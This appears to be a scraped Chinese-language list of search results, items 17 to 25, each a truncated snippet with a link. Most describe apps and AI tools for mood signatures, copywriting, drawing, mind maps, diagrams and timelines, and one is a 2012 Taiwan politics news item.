17.www.zknt.com/mokoi123月28日电 据台湾《中国时报》报道,正投入民进党2012年“大选”党内初选的苏贞昌接受专访指出,初选是累积合作能量的过程,无论输赢都只是个人问题。对于蔡英文,他强调自己不忍也不敢对她有一语一字的批评,不愿有任何一句话针对她。|_。 这份数据并称,除中国大陆之外,日本和韩国赴加拿大旅游的人数在前4个月是略有http://www.zknt.com/mokoi12_18/298395.html
18.一句话心情签名app安卓版官方下载一句话心情签名App是一款专为表达内心情感与情绪设计的轻量级应用。用户可以通过简短的文字、图片或表情符号,快速创建并分享自己的心情签名,与好友、社交媒体平台上的粉丝共享每日的喜怒哀乐。该应用界面简洁直观,支持用户自定义背景、字体及颜色,让每一次心情表达都独一无二。 软件功能 1.心情签名生成:用户可以生成各种https://m.yoyou.com/mipx/259363.html
19.自动生成文案的软件有哪些免费版自动生成文案的软件大全自动生成文案的软件有哪些?在我们日常生活还有工作之中,文案的工作都是比较多的,因为很多运营岗位都是需要文案的,而我们发朋友圈等社交平台的时候,也是需要很多文案的,这样的话一个智能的文案生成的app是非常好用的,帮助我们节约更多思考的时间,下面就给大家分享一http://www.downcc.com/k/zdscwadrj/
20.ai绘画描述词生成图片的软件哪个好?自动画图任你选的绘画工具只要一句话,就能得到你想要的图片!许多小伙伴都有想制作图片的想法,不过经常被自己想象的绘画过程所拦住,怕绘画的过程耗时长、画笔不好、不会构图、调色等等问题,这些是困扰我们动手创作止步不前的重要原因。其实我们也可以把这些问题统统抛掉,一个AI绘画自动生成的软https://cloud.tencent.com/developer/news/963826
21.TreeMind树图搭载最新GPTAI一句话生成思维导图,免费使用!TreeMind树图将彻底改变了这一切!它是基于AI人工智能的思维导图工具,只需要输入一句话,TreeMind树图立刻为你生成一张清晰连贯的思维导图。你只需要专注于思考,所有的繁琐工作都可以轻松交给它! 一、TreeMind树图 产品简介 作为首批「AIGC+思维导图」平台,TreeMind树图一句话即可生成详实的思维导图,开启了AI生成思维https://www.appinn.com/www.appinn.com/treemind/
22.阮一峰的网络日志FeedsAnywhere它们都能根据代码,生成图片,非常适合放入代码仓库,进行版本管理。 最近,我发现了一个更易用的同类工具D2,简单直观,功能强大,下面介绍给大家。 D2 可以命令行使用,也可以浏览器使用。假定你有一个图片代码文件example.d2,那么生成图片的命令如下。 $ d2 example.d2 https://feedsanywhere.com/feed/39994
23.图片拼接免费软件app智能拼接:智能拼接聊天记录,一键生成长图 台词拼接:影视字幕随意拼,更方便你借剧抒情。 九宫格拼图:一张图片生成九张图片,让你的动态更好看 图片马赛克:对于图片中的隐私信息可以进行马赛克遮盖 开发者:上海茂萦科技有限公司 拼长图下载安装失败或使用异常,请 -> https://m.pianwan.com/app/151935
24.整理出10款ai绘图软件免费,小白赶紧来收!boardmix AI 是一款革命性的工具,它使用 AI 人工智能算法生成思维导图,用于集思广益、组织和可视化想法。它可以帮助用户以清晰有效的方式组织他们的想法和思想,可用于生成各种思维导图,例如概念图、流程图和图表,可用于可视化复杂的想法和关系。 借助boardmix AI,任何人都可以通过简单地输入一句话来创建思维导图。你https://pixso.cn/designskills/10-free-ai-drawing-softwares/
25.ai下载mylensai一键生成时间轴下载v1.0官方版Mylens AI是一款创新的智能软件,它利用先进的人工智能技术,能够一键生成精准的时间轴图表。无论是历史时间表、重大新闻事件的时间线,还是科技产品和小说的发展脉络,用户只需通过简单的一句话描述需求,Mylens AI就能迅速捕捉意图,并自动整理、生成清晰的时间轴图表。这款软件不仅提高了工作效率,还为用户提供了直观、易http://www.962.net/azsoft/608049.html